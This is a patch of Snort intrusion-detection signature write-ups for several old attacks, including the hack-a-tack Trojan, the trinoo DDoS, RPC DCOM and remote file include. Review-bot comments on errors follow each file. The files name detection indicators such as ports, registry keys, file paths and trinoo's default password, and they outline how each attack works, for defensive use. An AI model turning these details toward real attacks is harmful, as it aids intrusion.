+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+The Trojan changes system registry settings to add the hack-a-tack server to programs normally started on boot. Due to the nature of this Trojan it is unlikely that the attacker's client IP address has been spoofed.
+
+	SID	Message
+	---	-------
+	141	HackAttack 1.20 Connect
+	614	hack-a-tack attempt
+
+This Trojan is commonly used to install other Trojan programs.
+
+The server portion opens TCP ports 31785 and 31787 and UDP ports 31789 and 31791 by default to establish a connection between client and server. The ports may then be configured by the attacker to use something other than these defaults.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located at <drive>:\WINDOWS\Expl32.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Explorer32 ="<drive>:\windows\Expl32.exe"
+	Configuration Wizard = "<drive>:\windows=cfgwiz32.exe"
+
+Removal of this entry is required.
+
+Delete the file(s) <drive>:\WINDOWS\Expl32.exe and <drive>:\windows=cfgwiz32.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS314
+http://www.whitehats.com/info/IDS504
+
+Hackfix.org
+http://www.hackfix.org/miscfix/hackatack.shtml
+
+Commodon Communications
+http://www.commodon.com/threat/threat-hack.htm
+
+--
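Review bot: The second registry value under Corrective Action in 614.txt looks mistyped: "Configuration Wizard = "<drive>:\windows=cfgwiz32.exe"" and the later "Delete the file(s) ... <drive>:\windows=cfgwiz32.exe" use "=" where the first entry uses a path separator ("<drive>:\windows\Expl32.exe"); confirm and fix to "\windows\cfgwiz32.exe". "Removal of this entry is required" follows two entries, so "these entries". The server location sentence ("The Trojan server is located at <drive>:\WINDOWS\Expl32.exe") sits under Ease of Attack but belongs in Detailed Information.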
--- /dev/null
+++ b/doc/signatures/3110.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3110
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
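Review bot: Additional References in 3110.txt is empty although Detailed Information describes a specific unchecked-buffer vulnerability in the License Logging Service; the Microsoft bulletin should be listed so the "appropriate vendor supplied patches" named in Corrective Action can be located. The Affected Systems entry "Microsoft Windows Server 2000" is not a product name; the other files in this patch write "Windows 2000".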
--- /dev/null
+++ b/doc/signatures/1761.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1761
+
+--
+Summary:
+This event is generated when network traffic indicating the use of an
+IDS system on the protected network is detected.
+
+--
+Impact:
+These tools may be used to compromise data on the network or may
+indicate mis-use of other IDS systems.
+
+--
+Detailed Information:
+This event indicates the use of an IDS tool. The source of the event
+should be investigated carefully. These tools may be used to gather data
+present in traffic on the protected network.
+
+--
+Affected Systems:
+	All networks.
+
+--
+Attack Scenarios:
+An unathorized user could use an IDS to gather data and observe traffic
+present on the network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
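Review bot: Corrective Action in 1761.txt is empty. Detailed Information already says the source of the event should be investigated, so at minimum "Investigate the source host and verify that the IDS deployment is authorized." belongs there. Typo in Attack Scenarios: "unathorized" should be "unauthorized".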
--- /dev/null
+++ b/doc/signatures/3248.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3248
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
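Review bot: 3248.txt is identical to 3429.txt earlier in this patch except for the Sid value, including the "Expoit code exists" typo under Ease of Attack (should be "Exploit"). If sids 3248 and 3429 match different traffic, the Detailed Information of each should say what distinguishes them; otherwise the duplication suggests one file was copied without being updated. Additional References is empty in both.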
--- /dev/null
+++ b/doc/signatures/237.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+237
+
+--
+Summary:
+This event is generated when a trinoo DDoS master host communicates with a daemon host.
+
+--
+Impact:
+Attempted DDoS. If the listed source IP is in your network, it may be a trinoo master. If the listed destination IP is in your network, it may be a trinoo daemon.
+
+--
+Detailed Information:
+The trinoo DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. Masters communicate with daemons to direct them to launch attacks.  A master may communicate with a daemon via UDP destination port 27444 with a string of "l44adsl" in the payload.  This string is the default password for the daemon.
+
+--
+Affected Systems:
+Any trinoo compromised host.
+
+--
+Attack Scenarios:
+A trinoo master will communicate with a daemon to direct it to launch attacks.
+
+--
+Ease of Attack:
+Simple. trinoo code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/incident_notes/IN-99-07.html#trinoo
+
+Arachnids:
+http://www.whitehats.com/info/IDS197
+
+--
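Review bot: False Negatives in 237.txt says "None Known." but Detailed Information states the rule looks for the string "l44adsl", which is only the default daemon password; a daemon built with a different password would not match, and that should be recorded under False Negatives. There is also a stray extra blank line before the "--" that ends Corrective Action.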
--- /dev/null
+++ b/doc/signatures/890.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+890
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running on a web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
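Review bot: "attackers choosing" (Impact and Detailed Information of 890.txt) should be "attacker's choosing". The line "relationships between the victim server and other hosts can be exploited by the attacker." runs past the wrap width used for the rest of the file. Like 1107.txt, this file does not say which CGI vulnerability sid 890 matches and has no Additional References.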
--- /dev/null
+++ b/doc/signatures/2535.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2535
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-Cert:
+http://www.kb.cert.org/vuls/id/150236
+
+--
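Review bot: Typo in Attack Scenarios of 2535.txt: "attcker" should be "attacker". Corrective Action "Apply the appropriate vendor supplied patches" is missing its period. Affected Systems would read better with full product names ("Windows 2000, Windows Server 2003 and Windows XP") rather than "2000, 2003 and XP".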
--- /dev/null
+++ b/doc/signatures/100000416.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000416
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "MyBloggie" application running on a webserver. Access to the file "admin.php" using a remote file being passed as the "mybloggie_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "mybloggie_root_path" parameter in the "admin.php" script used by the "MyBloggie" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MyBloggie
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
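Review bot: "running ona web server" in the Detailed Information of 100000416.txt should be "on a web server", and "attackers choosing" should be "attacker's choosing". The third paragraph is generic credential-checking text that does not describe the remote file include via "mybloggie_root_path" and could be dropped.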
--- /dev/null
+++ b/doc/signatures/708.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+--
+Sid: 708
+
+-- 
+
+Summary: 
+This event is generated when an attempt is made to overflow a buffer in the Microsoft SQL Server and Data Engine.
+
+-- 
+Impact: 
+Serious. A Denial of Service condition or execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A buffer overflow condition exists in some versions of Microsoft SQL Server and Data Engine that may allow an attacker to execute arbitrary code with system privileges or crash the SQL Server.
+
+The attacker must gain access to the SQL Server to exploit this vulnerability.
+
+--
+
+Attack Scenarios: 
+Exploit code exists.
+
+-- 
+
+Ease of Attack: 
+Simple. Exploit code exists.
+
+-- 
+
+False Positives: 
+None Known.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-1082
+
+Bugtraq:
+http://www.securityfocus.com/bid/2031
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/ms00-092.asp
+
+--
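Review bot: Attack Scenarios reads "Exploit code exists.", which is an ease-of-attack statement (and is repeated verbatim under Ease of Attack), not a scenario, and the file has no Affected Systems section at all, unlike the other signature docs in this patch. Detailed Information already contains the scenario ("The attacker must gain access to the SQL Server to exploit this vulnerability."); spell it out there, i.e. an authenticated SQL Server session passes an overlong argument to the vulnerable code path, crashing the service or running code with the privileges of the SQL Server process, and add an Affected Systems section naming the SQL Server and Data Engine versions covered by MS00-092 so that "Apply the appropriate vendor supplied patches" is actionable. The CVE link still uses the candidate form CAN-2000-1082; cve.mitre.org resolves it, but CVE-2000-1082 is the current name.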
--- /dev/null
+++ b/doc/signatures/1520.txt
@@ -0,0 +1,90 @@
+Rule:  
+
+--
+Sid:
+1520
+
+--
+Summary:
+This event is generated when an attempt is made to access server-info.
+Using the Apache webserver, this url is generally handled by the
+mod_info module, which will happily disclose valuable information about
+your webserver which may aid in their attack.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+The mod_info module "provides a comprehensive overview of the server
+configuration including all installed modules and directives in the
+configuration files" for the Apache webserver.  Successfully accessing the url
+that is handle by mod_info may give an attacker valuable information about
+the server.
+
+If mod_info is in use and the attacking host is allowed to access it,
+every possible configuration option that the Apache server is using can
+be viewed. This includes ACLs, modules, file and directory names, and
+other valuable information that will help an attacker determine ways of
+attacking the server.
+
+--
+Affected Systems:
+	Apache webservers with mod_info enabled.
+ 
+--
+Attack Scenarios:
+As part of an attack against an Apache webserver, an attacker may try to
+access "/server-info" which is typically handled by the mod_info module.  If
+sucessful, this will give valuable information about the webserver for
+use in further attacks. 
+
+--
+Ease of Attack:
+Simple. No exploit software is required.
+
+--
+False Positives:
+Few, but certainly possible.  Since this rule only checks for the
+existance of "/server-info" in the url, any url containing that string will
+trigger this rule.  A few common false positives may include urls like:
+
+http://victim/server-info/contact.html
+http://victim/really/long/directory/server-info.html
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Determine if server-info exists on the victim in question, and if the attacker
+is allowed to access it.
+
+If mod_info is necessary on this server, consider restricting access to
+it via Apache directives, i.e.:
+
+<Location /server-info>
+    SetHandler server-info
+    Order deny,allow
+    Deny from all
+    Allow from .yourdomain.net
+</Location>
+
+
+--
+Contributors:
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+
+-- 
+Additional References:
+
+Apache:
+http://httpd.apache.org/docs/mod/mod_info.html
+
+--
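Review bot: the Corrective Action example uses the Apache 1.3/2.2 access directives ("Order deny,allow" / "Deny from all" / "Allow from .yourdomain.net"); on Apache 2.4 these only work with mod_access_compat loaded, and the native form is "Require ip 10.0.0.0/8" (or "Require host .yourdomain.net") inside the same <Location /server-info> block. Add the 2.4 variant alongside, and prefer an IP range over a hostname suffix, since a hostname match depends on reverse DNS for the client. Two smaller points: the Additional References link uses the unversioned docs/mod/ path, which is the Apache 1.3 manual, so link the versioned page for the server release actually documented; and the Summary's "which may aid in their attack" has no antecedent for "their" (say "an attacker's"). Typos: "handle by mod_info", "sucessful", "existance".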
--- /dev/null
+++ b/doc/signatures/2724.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2724
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_date
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
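Review bot: the procedure name is split across a line break with the period on its own line ("vulnerability in the procedure add_priority_date" / ". This procedure is included in" / "dbms_repcat."), which looks like a template substitution that did not fold the newline; join it to "...in the procedure add_priority_date. This procedure is included in dbms_repcat." The same break appears in 2822.txt in this patch. Affected Systems has a doubled vendor ("Oracle Oracle9i"), and Additional References is empty even though the text claims a known vulnerability; cite the Oracle alert or CVE for the dbms_repcat overflows. Ease of Attack says "Simple." without noting that calling a dbms_repcat procedure requires an authenticated database session, which 2623.txt in this patch does state; keep the two consistent.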
--- /dev/null
+++ b/doc/signatures/391.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+391
+
+--
+
+Summary:
+This event is generated when an ICMP Alternate Host Address datagram is detected on the network with an invalid ICMP code.  This ICMP Type is not documented in an RFC, but may be implemented by routing equipment to direct hosts to the correct IP address of neighboring hosts.
+
+--
+
+Impact:
+This ICMP Type is not implemented in most standard operating systems and is a potential indication of information gathering activities.
+
+--
+
+Detailed Information:
+ICMP Type 6 (Alternate Host Address)  is not defined in an RFC and should not be considered legitimate network traffic.  
+
+--
+
+Attack Scenarios:
+Attackers may use this ICMP Type to gather information about the network.
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate ICMP Alternate Host Address datagrams with invalid ICMP codes.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 6 datagrams should be blocked at the firewall.
+
+--
+
+Contributors:
+Original Rule wirter unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
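Review bot: the Summary and the Detailed Information disagree about what this rule means. The Summary says Type 6 "may be implemented by routing equipment to direct hosts to the correct IP address of neighboring hosts" and that the event fires on "an invalid ICMP code", while Detailed Information says Type 6 "should not be considered legitimate network traffic" at all. State plainly which condition the rule matches (any Type 6 datagram, or Type 6 with a code outside the defined range) and describe the impact of that one condition; as written an analyst cannot tell whether a Type 6 Code 0 packet is expected to alert. Also "Original Rule wirter unknown" in Contributors.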
--- /dev/null
+++ b/doc/signatures/2124.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2124
+
+--
+Summary:
+This event is generated when an attempt is made to connect to a host running a Remote PC Access Server. 
+
+--
+Impact:
+Serious. System compromise leading to a compromise of all data on the target host.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to connect to a host using the Remote PC Access Server. This event may also be generated by an attacker using Nessus to scan for Remote PC Access. 
+
+Remote PC is used to remotely administer hosts via the Internet. It offers complete control of the client machine via a TCP connection.
+
+Login information is transmitted in clear text across a TCP connection, the attacker could recover this information by capturing a legitimate session. It may also be possible for an attacker to gain access by utilizing a brute force attack to discover the password to connect.
+
+--
+Affected Systems:
+Any host using the Remote PC Access Server.
+
+--
+Attack Scenarios:
+An attacker can connect to the Remote PC Access Server using the client program and gain complete control of the host if the password and username are known.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate login session may cause this rule to generate an event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable the Remote PC Access Server
+
+Disallow connection to the server from clients external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
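Review bot: Impact ("Serious. System compromise leading to a compromise of all data on the target host.") overstates what the rule observes, which the Summary describes as an attempt to connect, and False Positives already concedes that "A legitimate login session may cause this rule to generate an event." Say that a connection attempt is an indicator of possible remote control and that compromise follows only if the attacker holds valid or sniffed credentials, which Detailed Information already explains ("Login information is transmitted in clear text"). It would also help analysts to state the port or banner the rule keys on, so a legitimate session can be told apart from the Nessus probe mentioned in Detailed Information, and Additional References should not be empty for a named product.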
--- /dev/null
+++ b/doc/signatures/427.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+427
+
+--
+
+Summary:
+This event is generated when a router generates and ICMP Parameter Problem Unspecified Error datagram.
+
+--
+
+Impact:
+This could be an indication of a protocol error by a previous hop router.  Normally this datagram would only be generated with the datagram was truncated or damaged before it reached its final destination.
+
+--
+
+Detailed Information:
+A router generates a Parameter Problem message for any error not specifically covered by another ICMP message.  This could be an indication of routing problems on the network, or malfunctioning routing hardware.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 12 Code 0 datagrams are not normal network activity.  Hosts generating these types of datagrams should be investigated for configuration errors or nefarious activity.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
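Review bot: the Corrective Action contradicts the rest of the file: it says "ICMP Type 12 Code 0 datagrams are not normal network activity", but Impact and Detailed Information describe Parameter Problem as a router's or host's report of a malformed IP header, which is legitimate RFC 792 behaviour (Code 0 means the pointer field identifies the bad octet). Say instead that they should be rare and that a burst from one source warrants a look at the sender's configuration. Impact also misdescribes the trigger (a bad header field, not "truncated or damaged"; "with the datagram was" should be "when the datagram was"), the Summary has "generates and ICMP" for "an ICMP", and Attack Scenarios "None known" sits oddly next to Ease of Attack "Numerous tools and scripts can generate this type of ICMP datagram"; either describe a scenario or drop the Ease of Attack claim.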
--- /dev/null
+++ b/doc/signatures/1213.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1213
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
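Review bot: this description carries no rule-specific content: Summary, Impact, Detailed Information, Attack Scenarios and Corrective Action are the generic web-server template (the text from "This event is generated when an attempt is made to exploit a known vulnerability on a web server" through "attack scenarios are legion" is repeated word for word in 1489.txt later in this patch), Affected Systems is "All systems using a web server", and Additional References is empty. A signature doc should at least name the URI or content string sid 1213 matches and the product it targets, so that "Simple. Exploits exist." and the patch advice point somewhere; without that an analyst reading the alert learns nothing from the doc.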
--- /dev/null
+++ b/doc/signatures/100000629.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000629
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "message_view.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"message_view.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
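Review bot: the separator lines after the Sid and after Affected Systems lack the blank line used everywhere else in these files ("100000629" / "--" and "All systems running CGI applications using Indexu" / "--"), and the same inconsistency recurs in 100000556.txt and 100000701.txt in this patch; keep the layout uniform, since these files are split by section. On content, the third paragraph of Detailed Information and the Attack Scenarios are about credential validation and do not apply to a remote file include via "admin_template_path"; say instead that the attacker supplies a URL they control and message_view.php includes and runs the fetched PHP as the web server user, and in Corrective Action recommend disabling remote URL inclusion in PHP (allow_url_include) in addition to patching. "ona web server" should be "on a web server".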
--- /dev/null
+++ b/doc/signatures/1686.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1686
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
